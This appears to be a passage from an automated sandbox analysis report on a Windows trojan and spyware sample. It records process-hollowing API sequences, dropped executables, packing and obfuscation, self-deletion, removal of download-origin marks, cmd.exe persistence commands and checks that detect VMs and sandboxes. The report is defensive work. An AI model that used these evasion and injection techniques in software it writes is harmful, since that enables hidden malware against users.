Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_1_00402610 NtClose, 4_1_00402610
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_1_0040163E NtMapViewOfSection, 4_1_0040163E
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_1_0040223E NtQuerySystemInformation, 4_1_0040223E
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_1_004020CC NtQuerySystemInformation, 4_1_004020CC
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_1_00401592 NtAllocateVirtualMemory, 4_1_00401592
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 4_1_004015BC NtAllocateVirtualMemory, 4_1_004015BC
Source: C:\Users\user\AppData\Roaming\ecrjwib Code function: 15_2_00590110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 15_2_00590110
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_00730110 VirtualAlloc,GetModuleFileNameA,CreateProcessA,VirtualFree,VirtualAlloc,GetThreadContext,ReadProcessMemory,NtUnmapViewOfSection,VirtualAllocEx,NtWriteVirtualMemory,NtWriteVirtualMemory,WriteProcessMemory,SetThreadContext,ResumeThread,ExitProcess, 16_2_00730110
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051B2C00 NtUnmapViewOfSection, 17_2_051B2C00
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051B2CB8 NtAllocateVirtualMemory, 17_2_051B2CB8
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051B2CB2 NtAllocateVirtualMemory, 17_2_051B2CB2
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051B2BF8 NtUnmapViewOfSection, 17_2_051B2BF8
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_004019A9 Sleep,NtTerminateProcess, 20_2_004019A9
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_0040194C Sleep,NtTerminateProcess, 20_2_0040194C
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_0040196C Sleep,NtTerminateProcess, 20_2_0040196C
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_00402610 NtClose, 20_2_00402610
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_0040163E NtMapViewOfSection, 20_2_0040163E
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_0040223E NtQuerySystemInformation, 20_2_0040223E
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_004019CB Sleep,NtTerminateProcess, 20_2_004019CB
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_004020CC NtQuerySystemInformation, 20_2_004020CC
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_004019D4 NtTerminateProcess, 20_2_004019D4
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_00401592 NtAllocateVirtualMemory, 20_2_00401592
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_004019B6 Sleep,NtTerminateProcess, 20_2_004019B6
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 20_2_004015BC NtAllocateVirtualMemory, 20_2_004015BC
PE file contains executable resources (Code or Archives)
Source: CEB6.exe.6.dr Static PE information: Resource name: B7 type: 7-zip archive data, version 0.3
Source: pAWNholT8X.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 6CB1.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: E52D.exe.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: ecrjwib.6.dr Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: 8433.exe.6.dr Static PE information: Section: ZLIB complexity 0.999352181312
Source: 8433.exe.6.dr Static PE information: Section: .boot ZLIB complexity 0.995906760169
Source: CEB6.exe.6.dr Static PE information: Section: ZLIB complexity 0.999008098822
Source: CEB6.exe.6.dr Static PE information: Section: ZLIB complexity 0.989093223315
Source: CEB6.exe.6.dr Static PE information: Section: Intel Co ZLIB complexity 1.004296875
Source: pAWNholT8X.exe Static PE information: Section: .text IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\ecrjwib Jump to behavior
Source: classification engine Classification label: mal100.troj.spyw.evad.winEXE@39/9@57/7
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_0040104B LoadResource,WaitForMultipleObjects,GlobalGetAtomNameW,SetEvent,FreeUserPhysicalPages,VerLanguageNameW,CreateActCtxW,lstrcpyW,EraseTape,ReadFile,FindFirstVolumeW,FindNextVolumeA,AddConsoleAliasW,InterlockedIncrement, 0_2_0040104B
Source: pAWNholT8X.exe Virustotal: Detection: 36%
Source: pAWNholT8X.exe ReversingLabs: Detection: 40%
Source: C:\Users\user\Desktop\pAWNholT8X.exe Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers Jump to behavior
Source: unknown Process created: C:\Users\user\Desktop\pAWNholT8X.exe 'C:\Users\user\Desktop\pAWNholT8X.exe'
Source: C:\Users\user\Desktop\pAWNholT8X.exe Process created: C:\Users\user\Desktop\pAWNholT8X.exe 'C:\Users\user\Desktop\pAWNholT8X.exe'
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p
Source: unknown Process created: C:\Users\user\AppData\Roaming\ecrjwib C:\Users\user\AppData\Roaming\ecrjwib
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8433.exe C:\Users\user\AppData\Local\Temp\8433.exe
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Process created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe
Source: C:\Users\user\AppData\Roaming\ecrjwib Process created: C:\Users\user\AppData\Roaming\ecrjwib C:\Users\user\AppData\Roaming\ecrjwib
Source: unknown Process created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\CEB6.exe C:\Users\user\AppData\Local\Temp\CEB6.exe
Source: C:\Users\user\AppData\Local\Temp\CEB6.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E52D.exe C:\Users\user\AppData\Local\Temp\E52D.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\FE25.exe C:\Users\user\AppData\Local\Temp\FE25.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\247A.exe C:\Users\user\AppData\Local\Temp\247A.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E52D.exe 'C:\Users\user\AppData\Local\Temp\E52D.exe'
Source: C:\Users\user\AppData\Local\Temp\247A.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\3DEF.exe C:\Users\user\AppData\Local\Temp\3DEF.exe
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E52D.exe 'C:\Users\user\AppData\Local\Temp\E52D.exe'
Source: C:\Users\user\AppData\Local\Temp\3DEF.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C mkdir C:\Windows\SysWOW64\gelvdtot\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\AppData\Local\Temp\3DEF.exe Process created: C:\Windows\SysWOW64\cmd.exe 'C:\Windows\System32\cmd.exe' /C move /Y 'C:\Users\user\AppData\Local\Temp\dkwjsfga.exe' C:\Windows\SysWOW64\gelvdtot\
Source: C:\Windows\SysWOW64\cmd.exe Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\pAWNholT8X.exe Process created: C:\Users\user\Desktop\pAWNholT8X.exe 'C:\Users\user\Desktop\pAWNholT8X.exe' Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\8433.exe C:\Users\user\AppData\Local\Temp\8433.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\CEB6.exe C:\Users\user\AppData\Local\Temp\CEB6.exe Jump to behavior
Source: C:\Windows\explorer.exe Process created: C:\Users\user\AppData\Local\Temp\E52D.exe C:\Users\user\AppData\Local\Temp\E52D.exe Jump to behavior
Source: C:\Users\user\AppData\Roaming\ecrjwib Process created: C:\Users\user\AppData\Roaming\ecrjwib C:\Users\user\AppData\Roaming\ecrjwib Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Process created: C:\Users\user\AppData\Local\Temp\6CB1.exe C:\Users\user\AppData\Local\Temp\6CB1.exe Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process created: C:\Users\user\AppData\Local\Temp\757C.exe C:\Users\user\AppData\Local\Temp\757C.exe Jump to behavior
Source: C:\Windows\explorer.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\{0f87369f-a4e5-4cfc-bd3e-73e6154572dd}\InprocServer32 Jump to behavior
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6CB1.tmp Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll Jump to behavior
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6740:120:WilError_01
Source: C:\Windows\System32\conhost.exe Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:5608:120:WilError_01
Source: C:\Users\user\Desktop\pAWNholT8X.exe Command line argument: PN@ 0_2_00404DA0
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Command line argument: PN@ 16_2_00404DA0
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: C:\Windows\System32\svchost.exe File read: C:\Windows\System32\drivers\etc\hosts Jump to behavior
Source: Window Recorder Window detected: More than 3 window changes detected
Source: pAWNholT8X.exe Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_DEBUG
Source: Binary string: Z:\Development\Secureuser\src\plugins_manager\internal_plugins\embedded dlls\TlsHelperXBundler\Release\XBundlerTlsHelper.pdb source: 8433.exe
Source: Binary string: #fNC:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
Source: Binary string: C:\neziyotugi voyosededidi.pdb source: 6CB1.exe, 00000010.00000000.473271527.0000000000412000.00000002.00020000.sdmp
Source: Binary string: C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp
Source: Binary string: )/C:\hebesolazo\fanelugiken.pdb source: pAWNholT8X.exe, 00000000.00000002.364281095.0000000000412000.00000002.00020000.sdmp, ecrjwib, 0000000F.00000000.461024163.0000000000412000.00000002.00020000.sdmp

Data Obfuscation:

barindex
Detected unpacking (changes PE section rights)
Source: C:\Users\user\Desktop\pAWNholT8X.exe Unpacked PE file: 4.2.pAWNholT8X.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Source: C:\Users\user\AppData\Local\Temp\8433.exe Unpacked PE file: 19.2.8433.exe.300000.0.unpack :ER; :R; :R;.idata:W;.themida:EW;.boot:ER;MSI GF65:ER;MSI GF65:ER;.rsrc:R; vs :ER; :R; :R;
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Unpacked PE file: 20.2.6CB1.exe.400000.0.unpack .text:ER;.rdata:R;.data:W;.rsrc:R; vs .text:EW;
Uses code obfuscation techniques (call, push, ret)
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_00402999 push ecx; ret 0_2_004029AC
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_00659D01 push eax; ret 0_2_00659D02
Source: C:\Users\user\AppData\Roaming\ecrjwib Code function: 15_2_007693E1 push eax; ret 15_2_007693E2
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_00402999 push ecx; ret 16_2_004029AC
Source: C:\Users\user\AppData\Local\Temp\6CB1.exe Code function: 16_2_007A98D9 push eax; ret 16_2_007A98DA
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051B2077 push ebx; retf 17_2_051B207A
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C5D98 pushad ; iretd 17_2_051C5D99
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C6DCF push eax; iretd 17_2_051C6DD2
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C6F31 push ecx; iretd 17_2_051C6F32
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C6F33 push ecx; iretd 17_2_051C6F3A
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C6FAF push ebp; iretd 17_2_051C6FB2
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C3FA9 push ds; iretd 17_2_051C3FAA
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C3FA0 push ds; iretd 17_2_051C3FA2
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C796B pushad ; iretd 17_2_051C797A
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C79FF pushad ; iretd 17_2_051C7A02
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C4013 push ds; iretd 17_2_051C401A
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C7071 push esi; iretd 17_2_051C7072
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C7B00 pushad ; iretd 17_2_051C7B02
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C7B03 pushad ; iretd 17_2_051C7B0A
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C7A71 pushad ; iretd 17_2_051C7A72
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C7AC9 pushad ; iretd 17_2_051C7ACA
Source: C:\Users\user\AppData\Local\Temp\757C.exe Code function: 17_2_051C7ACB pushad ; iretd 17_2_051C7AD2
Contains functionality to dynamically determine API calls
Source: C:\Users\user\Desktop\pAWNholT8X.exe Code function: 0_2_00405286 LoadLibraryA,GetProcAddress,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,GetProcAddress,__encode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer,__decode_pointer, 0_2_00405286
Binary contains a suspicious time stamp
Source: 757C.exe.6.dr Static PE information: 0x9DFA6F45 [Sat Dec 27 08:03:17 2053 UTC]
PE file contains sections with non-standard names
Source: 8433.exe.6.dr Static PE information: section name:
Source: 8433.exe.6.dr Static PE information: section name:
Source: 8433.exe.6.dr Static PE information: section name:
Source: 8433.exe.6.dr Static PE information: section name: .themida
Source: 8433.exe.6.dr Static PE information: section name: .boot
Source: 8433.exe.6.dr Static PE information: section name: MSI GF65
Source: 8433.exe.6.dr Static PE information: section name: MSI GF65
Source: CEB6.exe.6.dr Static PE information: section name:
Source: CEB6.exe.6.dr Static PE information: section name:
Source: CEB6.exe.6.dr Static PE information: section name:
Source: CEB6.exe.6.dr Static PE information: section name: Intel Co
Source: CEB6.exe.6.dr Static PE information: section name: .themida
Source: CEB6.exe.6.dr Static PE information: section name: Intel Co
Source: FE25.exe.6.dr Static PE information: section name: RAM 8GB
Source: FE25.exe.6.dr Static PE information: section name: RAM 8GB
Source: FE25.exe.6.dr Static PE information: section name: RAM 8GB
Entry point lies outside standard sections
Source: initial sample Static PE information: section where entry point is pointing to: .boot
PE file contains an invalid checksum
Source: CEB6.exe.6.dr Static PE information: real checksum: 0x34f922 should be: 0x353a8e
Source: 757C.exe.6.dr Static PE information: real checksum: 0x0 should be: 0x73fa7
Source: initial sample Static PE information: section name: .text entropy: 7.5513445643
Source: initial sample Static PE information: section name: .text entropy: 7.56187374958
Source: initial sample Static PE information: section name: entropy: 7.98639479395
Source: initial sample Static PE information: section name: .boot entropy: 7.9543414958
Source: initial sample Static PE information: section name: MSI GF65 entropy: 7.3616909148
Source: initial sample Static PE information: section name: MSI GF65 entropy: 7.38545121469
Source: initial sample Static PE information: section name: entropy: 7.98585699805
Source: initial sample Static PE information: section name: Intel Co entropy: 7.37183763951
Source: initial sample Static PE information: section name: .text entropy: 7.53272046759
Source: initial sample Static PE information: section name: .text entropy: 7.5513445643

Persistence and Installation Behavior:

barindex
Drops files with a non-matching file extension (content does not match file extension)
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\ecrjwib Jump to dropped file
Drops PE files
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\6CB1.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E52D.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8433.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\CEB6.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\ecrjwib Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\757C.exe Jump to dropped file
Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\FE25.exe Jump to dropped file

Hooking and other Techniques for Hiding and Protection:

barindex
Uses known network protocols on non-standard ports
Source: unknown Network traffic detected: HTTP traffic on port 49841 -> 9080
Source: unknown Network traffic detected: HTTP traffic on port 9080 -> 49841
Deletes itself after installation
Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\pawnholt8x.exe Jump to behavior
Hides that the sample has been downloaded from the Internet (zone.identifier)
Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\ecrjwib:Zone.Identifier read attributes | delete Jump to behavior
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Source: C:\Windows\explorer.exe Registry key monitored for changes: HKEY_CURRENT_USER_Classes Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Windows\explorer.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\8433.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior
Source: C:\Users\user\AppData\Local\Temp\757C.exe Process information set: NOOPENFILEERRORBOX Jump to behavior

Malware Analysis System Evasion:

barindex
Query firmware table information (likely to detect VMs)
Source: C:\Users\user\AppData\Local\Temp\8433.exe System information queried: FirmwareTableInformation Jump to behavior
Tries to detect sandboxes / dynamic malware analysis system (registry check)
